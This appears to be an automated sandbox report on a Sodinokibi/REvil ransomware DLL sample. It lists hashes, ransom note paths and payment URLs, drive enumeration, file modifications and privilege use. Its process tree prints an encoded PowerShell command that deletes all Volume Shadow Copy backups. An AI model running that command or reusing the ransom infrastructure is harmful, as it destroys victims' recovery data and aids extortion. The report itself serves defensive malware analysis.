Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
06-05-2024 00:30
Behavioral task
behavioral1
Sample
19e7e57a7622586a96b10cc489303d0e_JaffaCakes118.dll
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
19e7e57a7622586a96b10cc489303d0e_JaffaCakes118.dll
Resource
win10v2004-20240419-en
General
-
Target
19e7e57a7622586a96b10cc489303d0e_JaffaCakes118.dll
-
Size
164KB
-
MD5
19e7e57a7622586a96b10cc489303d0e
-
SHA1
09e751d3f6078b21a534a319af248e03d82decdd
-
SHA256
c25b0b627ea052c67ef549e1040e5a33779f8661172c2df6420de1d2b228f7b7
-
SHA512
d059f5ba4cf37389a6d12701d7d37e4ec1815367a7c9822ff22a287ec3dcb99a669d8b48bea0948948d4235f86c0808ce8d0a01bbd9bc1914056c5e9874f7554
-
SSDEEP
3072:v0XoUeZ/DVS8L73ea4MoCLfqQvFfp/TIdPVBf:veoUeZR2TRCWQFfhTId
Malware Config
Extracted
C:\Users\34as0d2y-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B52086FF733C4617
http://decryptor.cc/B52086FF733C4617
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\D: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\M: rundll32.exe -
Drops file in Program Files directory 24 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification \??\c:\program files\WatchSelect.crw rundll32.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\34as0d2y-readme.txt rundll32.exe File opened for modification \??\c:\program files\DenyUndo.m1v rundll32.exe File opened for modification \??\c:\program files\MergeConfirm.rm rundll32.exe File opened for modification \??\c:\program files\RestoreDisconnect.mpg rundll32.exe File opened for modification \??\c:\program files\UnblockSave.dwfx rundll32.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\34as0d2y-readme.txt rundll32.exe File created \??\c:\program files\34as0d2y-readme.txt rundll32.exe File opened for modification \??\c:\program files\AddProtect.vsd rundll32.exe File opened for modification \??\c:\program files\EnableUnblock.jpg rundll32.exe File opened for modification \??\c:\program files\UseRegister.odt rundll32.exe File opened for modification \??\c:\program files\RestartClear.shtml rundll32.exe File opened for modification \??\c:\program files\SuspendExpand.7z rundll32.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\34as0d2y-readme.txt rundll32.exe File opened for modification \??\c:\program files\AssertSearch.raw rundll32.exe File opened for modification \??\c:\program files\ConfirmWatch.scf rundll32.exe File opened for modification \??\c:\program files\MountConvert.php rundll32.exe File opened for modification \??\c:\program files\RenameFind.mpeg rundll32.exe File opened for modification \??\c:\program files\UnlockRepair.wmx rundll32.exe File opened for modification \??\c:\program files\UnlockSave.tiff rundll32.exe File created \??\c:\program files (x86)\34as0d2y-readme.txt rundll32.exe File opened for modification \??\c:\program files\JoinCompress.easmx rundll32.exe File opened for modification \??\c:\program files\RevokeDisable.wpl rundll32.exe File opened for modification \??\c:\program files\SetSwitch.3gpp rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
rundll32.exepowershell.exepid process 2232 rundll32.exe 2220 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
rundll32.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 2232 rundll32.exe Token: SeDebugPrivilege 2220 powershell.exe Token: SeBackupPrivilege 2456 vssvc.exe Token: SeRestorePrivilege 2456 vssvc.exe Token: SeAuditPrivilege 2456 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 1568 wrote to memory of 2232 1568 rundll32.exe rundll32.exe PID 1568 wrote to memory of 2232 1568 rundll32.exe rundll32.exe PID 1568 wrote to memory of 2232 1568 rundll32.exe rundll32.exe PID 1568 wrote to memory of 2232 1568 rundll32.exe rundll32.exe PID 1568 wrote to memory of 2232 1568 rundll32.exe rundll32.exe PID 1568 wrote to memory of 2232 1568 rundll32.exe rundll32.exe PID 1568 wrote to memory of 2232 1568 rundll32.exe rundll32.exe PID 2232 wrote to memory of 2220 2232 rundll32.exe powershell.exe PID 2232 wrote to memory of 2220 2232 rundll32.exe powershell.exe PID 2232 wrote to memory of 2220 2232 rundll32.exe powershell.exe PID 2232 wrote to memory of 2220 2232 rundll32.exe powershell.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\19e7e57a7622586a96b10cc489303d0e_JaffaCakes118.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\19e7e57a7622586a96b10cc489303d0e_JaffaCakes118.dll,#12⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\34as0d2y-readme.txtFilesize
6KB
MD579ef12f508f4e396a4174248c69fe196
SHA13fa90e82de1ae332059fae6ce4e1df2e4813d01c
SHA2561696a68117401365320c554f5ea27268762046f6afca2a47d01aefa4747adc3e
SHA512b9cd3579534cb8408cc920f8045ad0888ed8d8336843003e65e33ff71bad2ed4f13952aab453cbf3e949fd032b152d1975087818c389fb885654bbbc9146ed66
-
memory/2220-4-0x000007FEF5D4E000-0x000007FEF5D4F000-memory.dmpFilesize
4KB
-
memory/2220-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmpFilesize
2.9MB
-
memory/2220-7-0x000007FEF5A90000-0x000007FEF642D000-memory.dmpFilesize
9.6MB
-
memory/2220-6-0x0000000002340000-0x0000000002348000-memory.dmpFilesize
32KB
-
memory/2220-8-0x000007FEF5A90000-0x000007FEF642D000-memory.dmpFilesize
9.6MB
-
memory/2220-9-0x000007FEF5A90000-0x000007FEF642D000-memory.dmpFilesize
9.6MB
-
memory/2220-10-0x000007FEF5A90000-0x000007FEF642D000-memory.dmpFilesize
9.6MB
-
memory/2220-11-0x000007FEF5A90000-0x000007FEF642D000-memory.dmpFilesize
9.6MB
-
memory/2220-12-0x000007FEF5A90000-0x000007FEF642D000-memory.dmpFilesize
9.6MB